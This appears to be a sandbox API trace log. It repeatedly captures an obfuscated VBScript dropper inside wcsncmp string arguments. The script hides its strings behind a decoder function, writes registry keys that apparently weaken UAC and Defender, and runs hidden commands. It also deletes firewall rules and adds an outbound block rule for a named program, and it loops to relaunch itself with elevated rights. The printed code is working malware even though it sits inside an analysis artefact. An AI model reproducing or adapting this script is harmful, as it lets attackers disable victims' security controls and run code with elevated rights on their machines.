bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.317] wcsncmp (_String1="ion\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.317] wcsncmp (_String1="on\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.317] wcsncmp (_String1="n\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.317] wcsncmp (_String1="\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra 